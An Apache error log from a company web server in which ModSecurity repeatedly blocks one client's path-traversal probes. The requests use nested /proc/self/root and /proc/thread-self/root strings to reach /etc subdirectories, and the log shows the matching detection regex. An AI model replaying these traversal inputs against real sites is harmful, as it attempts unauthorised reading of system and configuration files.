[Fri Mar 20 06:11:08.015257 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.243.128:57554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PLLninkcc-iUj5ApJHwAAA5Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:13.677447 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:57562] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PMRCii7xarUs8iHZSzgAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:15.044170 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.243.128:43296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PMzJ3M9BSuKP7CAYCgAAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:18.445087 2026] [:error] [pid 31215:tid 140411590858496] [client 74.7.243.128:43312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PNQF0L0L-SsrnPo5SrwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:19.839116 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:57162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PN_qxLDW4GITHUkTQCwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:22.058909 2026] [:error] [pid 31215:tid 140411725141760] [client 74.7.243.128:57178] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0POgF0L0L-SsrnPo5StAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:23.379335 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:57182] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PO9a6ubjKNq_cu4a9WgAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:24.846382 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:57194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PPPqxLDW4GITHUkTQFAAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:26.188955 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.243.128:57200] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PPhCii7xarUs8iHZS1QAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:27.475055 2026] [:error] [pid 10189:tid 140411699963648] [client 74.7.243.128:57216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PPzJ3M9BSuKP7CAYCggAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:28.786790 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:57228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PQDJ3M9BSuKP7CAYCgwAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:30.083035 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.243.128:38272] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PQjJ3M9BSuKP7CAYChgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:33.521018 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:38288] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PRTJ3M9BSuKP7CAYCjwAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:34.833309 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:38296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PRgF0L0L-SsrnPo5SuQAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:36.123325 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.243.128:38308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PSF1pVZ5mVmJwsFMbKgAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:37.448786 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:38314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PSQF0L0L-SsrnPo5SuwAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:38.751976 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:38328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PSuoXxyEfFpUF8f9smQAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:41.147081 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:34406] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PTeoXxyEfFpUF8f9snQAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:42.393916 2026] [:error] [pid 11167:tid 140411540502272] [client 74.7.243.128:34414] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PTvHIg5MgXLBnicPklQAAAdg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:44.746066 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.243.128:34430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PTwF0L0L-SsrnPo5SwQAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:11:45.887742 2026] [mime_magic:error] [pid 26799:tid 140411741927168] (70014)End of file found: [client 57.141.18.91:49162] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:11:48.735480 2026] [:error] [pid 7893:tid 140411674785536] [client 74.7.243.128:34434] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PVBCii7xarUs8iHZS5QAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
